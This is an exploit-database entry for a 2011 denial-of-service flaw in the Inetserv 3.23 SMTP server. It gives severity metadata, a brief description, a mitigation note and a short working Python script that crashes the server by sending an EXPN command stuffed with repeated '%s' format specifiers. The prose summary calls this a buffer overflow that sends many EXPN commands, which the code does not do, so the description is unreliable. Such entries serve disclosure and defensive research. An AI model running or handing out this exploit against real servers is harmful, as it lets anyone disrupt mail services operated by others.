header-logo
Suggest Exploit
vendor:
Inetserv
by:
G13
7.5
CVSS
HIGH
Denial of Service (DoS)
400
CWE
Product Name: Inetserv
Affected Version From: 3.23
Affected Version To: 3.23
Patch Exists: YES
Related CWE: N/A
CPE: a:avtronics:inetserv
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2011

Inetserv 3.23 SMTP DoS

This exploit is for Inetserv 3.23 SMTP DoS vulnerability. It uses a buffer overflow to send a large number of 'EXPN' commands to the server, causing it to crash. The exploit is written in Python and tested on WinXP SP0 Eng.

Mitigation:

Upgrade to the latest version of Inetserv, or use an alternative SMTP server.
Source

Exploit-DB raw data:

#!/usr/bin/python
# Exploit Title: Inetserv 3.23 SMTP DoS
# Date: 1/22/2011
# Author: G13
# Software Link: http://www.avtronics.net/inetserv.php
# Version: 3.23
# Tested on: WinXP SP0 Eng

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = "EXPN " + "%s" * 40 + "\r\n"

s.connect(('127.0.0.1',25))

data=s.recv(1024)
s.send("HELO\r\n")

s.send(buffer)

s.send("HELP\r\n")
s.close()